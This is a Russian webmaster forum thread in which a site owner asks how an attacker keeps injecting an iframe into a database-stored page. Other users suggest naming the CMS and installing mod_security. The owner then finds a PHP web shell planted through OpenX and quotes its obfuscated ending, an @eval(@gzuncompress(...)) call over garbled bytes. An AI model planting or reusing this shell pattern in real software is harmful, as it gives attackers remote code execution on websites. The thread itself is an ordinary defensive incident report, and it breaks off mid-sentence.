- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Ситуация следующая.
Хулиган постоянно вставляет iframe в одну из страниц сайта.
Вставляет на в саму страницу, а иммено в текст этой страницы в БД (mysql)
Менял пароль к бд, к админке... не помогло.
Полагаю есть дыра в коде.
Помогите советом, как отловить поганца и найти дыру?
Ситуация следующая.
Хулиган постоянно вставляет iframe в одну из страниц сайта.
Вставляет на в саму страницу, а иммено в текст этой страницы в БД (mysql)
Менял пароль к бд, к админке... не помогло.
Полагаю есть дыра в коде.
Помогите советом, как отловить поганца и найти дыру?
На какой CMS сайт работает укажите?
На какой CMS сайт работает укажите?
Все писалось самостоятельно
Попросить сисадмина поставить mod_security
Попросить сисадмина поставить mod_security
Спасибо, разберусь с модом.
НАШЕЛ таки))) файл php-шный в директории Openx, куда баннеры подгружаются, через этот софт поимели.
Запрос к файлу по POST приходил с амерского сервака
Полагаю это пхпшелл, закриптован код странно, не зенд.
файл заканчивается:
str_repeat(md5($_SERVER["HTTP_USER_AGENT"].$_COOKIE["z_salt"]),72);@eval(@gzuncompress(($ІSѓ_іBa›њ51Д^51Д)));
Есть ли варианты восстановить исходный код файла?
Выполнять по очереди каждое из действ